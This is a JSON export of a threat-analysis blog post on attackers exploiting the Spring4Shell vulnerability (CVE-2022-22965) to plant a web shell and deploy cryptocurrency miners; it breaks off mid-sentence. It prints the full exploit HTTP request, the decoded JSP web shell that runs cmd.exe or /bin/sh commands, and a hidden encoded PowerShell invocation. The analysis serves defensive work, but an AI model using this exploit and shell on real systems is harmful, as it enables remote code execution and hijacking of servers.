{"id":46270,"date":"2022-04-20T00:00:00","date_gmt":"2022-04-20T00:00:00","guid":{"rendered":"urn:uuid:153e5adb-6016-30f6-fa35-8506ff0c68b5"},"modified":"2022-04-20T00:00:00","modified_gmt":"2022-04-20T00:00:00","slug":"spring4shell-vulnerability-cve-2022-22965-exploited-to-deploy-cryptocurrency-miners","status":"publish","type":"post","link":"https:\/\/www.threatshub.org\/blog\/spring4shell-vulnerability-cve-2022-22965-exploited-to-deploy-cryptocurrency-miners\/","title":{"rendered":"Spring4Shell Vulnerability CVE-2022-22965 Exploited to Deploy Cryptocurrency Miners"},"content":{"rendered":"

<\/p>\n

<\/div>\n

Among the exploitation attempts were ones aimed at deploying cryptocurrency miners. In this section, we look at how the malicious actors behind these exploitation attempts create a web shell to deploy their cryptocurrency miners.<\/p>\n

The following code is used to create the web shell:<\/p>\n

GET \/?class.module.classLoader.resources.context.parent.pipeline.first.prefix=zbc0fb&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps%2FROOT&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bx%7Di+try+%7BRuntime.getRuntime%28%29.exec%28System.getProperty%28%22os.name%22%29.contains%28%22ndo%22%29+%3F+new+String%5B%5D%7B%22cmd.exe%22%2C+%22%2Fc%22%2C+request.getParameter%28%22w%22%29%7D+%3A+new+String%5B%5D%7B%22%2Fbin%2Fsh%22%2C+%22-c%22%2C+request.getParameter%28%22l%22%29%7D%29%3B%7D+catch+%28Exception+e%29+%7B%7D%3Bout.print%28%22%40pong%22%29%3B+%25%7Bz%7Di HTTP\/1.1<\/u><\/b><\/h5>\n
Host: <redacted>:<redacted><\/h5>\n
User-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko\/20100101 Firefox\/83.0<\/h5>\n
Accept: *\/*<\/h5>\n
Accept-Language: en-US,en;q=0.5<\/h5>\n
X: <%<\/h5>\n
Y: Runtime<\/h5>\n
Z: %>\/\/<\/h5>\n
Accept-Encoding: gzip<\/h5>\n
 <\/h5>\n

The web shell\u2019s content is URL-encoded using the following code:<\/p>\n

%25%7Bx%7Di+try+%7BRuntime.getRuntime%28%29.exec%28System.getProperty%28%22os.name%22%29.contains%28%22ndo%22%29+%3F<\/h5>\n
+new+String%5B%5D%7B%22cmd.exe%22%2C+%22%2Fc%22%2C+request.getParameter%28%22w%22%29%7D+%3A+new+String%5B%5D%7B%22%2Fbin%2Fsh%22%2C+%22-<\/h5>\n
c%22%2C+request.getParameter%28%22l%22%29%7D%29%3B%7D+catch+%28Exception+e%29+%7B%7D%3Bout.print%28%22%40pong%22%29%3B+%25%7Bz%7Di<\/h5>\n
 <\/h5>\n

After decoding, the resulting payload is a Spring4Shell web shell:<\/p>\n

%{x}i try {Runtime.getRuntime().exec(System.getProperty(“os.name”).contains(“ndo”) ? new String[]{“cmd.exe”, “\/c”, request.getParameter(“w”)} : new String[]{“\/bin\/sh”, “-c”,<\/h5>\n
request.getParameter(“l”)});} catch (Exception e) {};out.print(“@pong”); %{z}I<\/h5>\n
 <\/h5>\n

Before executing the payload, the malicious actors first have to determine the operating system of the machine they are infecting. They do this using a string check to see if \u201cos.name\u201d contains the word \u201cndo\u201d. If it does, then the machine is identified as Windows-based, otherwise the machine is identified as Linux-based.<\/p>\n

Once the operating system is identified, the encoded payload is executed. The exploit uniform resource identifier (URI) containing the web shell path and parameters is shown in the following code:<\/p>\n

\/zbc0fb.jsp<\/span>?w<\/span>=powershell.exe+-NonI+-W+Hidden+-NoP+-Exec+Bypass+-Enc+<base64 encoded content> &l=echo+<base64 encoded content><\/h5>\n
 <\/h5>\n

The web shell is identified as zbc0fb.jsp, while the parameters w and l stand for, respectively, Windows and Linux payloads, which are Base64-encoded.<\/p>\n

PowerShell is then executed using the following parameters:<\/p>\n